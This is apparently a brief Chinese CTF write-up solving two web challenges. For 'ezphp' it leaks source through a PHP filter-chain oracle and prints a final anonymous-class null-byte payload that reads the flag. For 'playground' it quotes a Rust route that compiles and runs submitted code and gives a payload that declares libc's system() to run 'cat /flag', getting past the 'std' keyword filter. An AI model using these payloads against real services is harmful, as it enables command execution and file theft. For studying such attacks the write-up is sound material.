目录
时间原因只打了2个小时,出了2道,简单记录一下
ezphp
参考文章
PHP filter chains: file read from error-based oracle
https://github.com/synacktiv/php_filter_chains_oracle_exploit
用上面的脚本爆出部分源码,直接/flag.php?ezphpPhp=1访问
创建了一个匿名类
参考文章:
最终payload:
/flag.php?ezphpPhp8=class@anonymous%00/var/www/html/flag.php:7$0🤬本地通了,远程一直not found,重开靶机后一样的payload直接打出来了
playground
进题是一段rust代码
重点关注post的/rust_code这个路由
#[post("/rust_code", data = "<code>")]
fn run_rust_code(code: String) -> String{
if code.contains("std") {
return "Error: std is not allowed".to_string();
}
//generate a random 5 length file name
let file_name = rand::thread_rng()
.sample_iter(&rand::distributions::Alphanumeric)
.take(5)
.map(char::from)
.collect::<String>();
if let Ok(mut file) = File::create(format!("playground/{}.rs", &file_name)) {
file.write_all(code.as_bytes());
}
if let Ok(build_output) = Command::new("rustc")
.arg(format!("playground/{}.rs",&file_name))
.arg("-C")
.arg("debuginfo=0")
.arg("-C")
.arg("opt-level=3")
.arg("-o")
.arg(format!("playground/{}",&file_name))
.output() {
if !build_output.status.success(){
fs::remove_file(format!("playground/{}.rs",&file_name));
return String::from_utf8_lossy(build_output.stderr.as_slice()).to_string();
}
}
fs::remove_file(format!("playground/{}.rs",&file_name));
if let Ok(output) = Command::new(format!("playground/{}",&file_name))
.output() {
if !output.status.success(){
fs::remove_file(format!("playground/{}",&file_name));
return String::from_utf8_lossy(output.stderr.as_slice()).to_string();
} else{
fs::remove_file(format!("playground/{}",&file_name));
return String::from_utf8_lossy(output.stdout.as_slice()).to_string();
}
}
return String::default();
}payload:
extern "C"{
fn system(cmd: *const u8) -> i32;
}
fn main(){
unsafe{
system("cat /flag".as_ptr());
}
}直接放请求体里即可